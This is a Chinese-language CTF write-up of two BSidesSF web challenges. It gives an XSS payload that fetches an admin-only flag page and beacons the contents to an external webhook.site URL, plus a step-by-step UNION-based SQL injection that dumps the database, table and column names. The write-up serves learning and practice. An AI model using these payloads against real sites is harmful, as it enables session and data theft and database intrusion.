首页
学习
活动
专区
圈层
工具
发布
社区首页 >专栏 >BSidesSF CTF

BSidesSF CTF

作者头像
故里[TRUE]
发布2023-04-19 20:12:44
发布2023-04-19 20:12:44
6340
举报

这个比赛题目比较典型,有学习价值,只写了web

web-tutorial-1

Can you use XSS to steal the flag from the admin? This challenge is sponsored by the Google Security Team. Come see our BSidesSF booth if you’re interested in joining us!

payload如下:

代码语言:javascript
复制
<script type="text/javascript"> (async function(){navigator.sendBeacon("https://webhook.site/08022f63-cc45-4e24-b4de-fea91c310419",await fetch("https://web-tutorial-1-a1ef0161.challenges.bsidessf.net/xss-one-flag").then(r=>r.text()).then(d=>d))})()    </script>

得到flag CTF{XS5-W0rks-h3r3}

Sequels: A New Bug

We’ve decided to track known Jedi and Sith, so we put together this database. Hopefully there are no bugs?

最典型最基础的sql注入,通过这个题目再让我重新认识一下sql注入漏洞。

这是一个查询功能,能查到的名字和信息下方已经给了,随便输入一天名字发现能出现,但是加个就查不到了,存在sql’注入漏洞。

对于sql注入漏洞的识别 首先可以试试单引号、双引号、单括号、双括号等看看是否报错,如果报错就八成存在SQL注入漏洞了。 其次在URL后面加and 1=1 、 and 1=2看页面是否显示一样,显示不一样的话就存在SQL注入漏洞了。

这道题首先是猜字段

代码语言:javascript
复制
Darth Bane' order by 3# 返回正常
代码语言:javascript
复制
Darth Bane' order by 4# 错误
代码语言:javascript
复制
Darth Bane' union select 1,2,3#

然后爆数据库名

代码语言:javascript
复制
Darth Bane' union select 1,database(),3#
//得到数据库名是sequels1

爆表名

代码语言:javascript
复制
1' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema="sequels1"#
//得到俩表,flags和jedi

爆列名

代码语言:javascript
复制
1' union select 1,group_concat(column_name),3 from information_schema.columns where table_name="flags" #

读取value数据,得到flag

代码语言:javascript
复制
CTF{help_me_hacker_youre_my_only_hope}
本文参与 腾讯云自媒体同步曝光计划,分享自作者个人站点/博客。
原始发表:2022-06-052,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 作者个人站点/博客 前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体同步曝光计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
目录
  • web-tutorial-1
  • Sequels: A New Bug
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档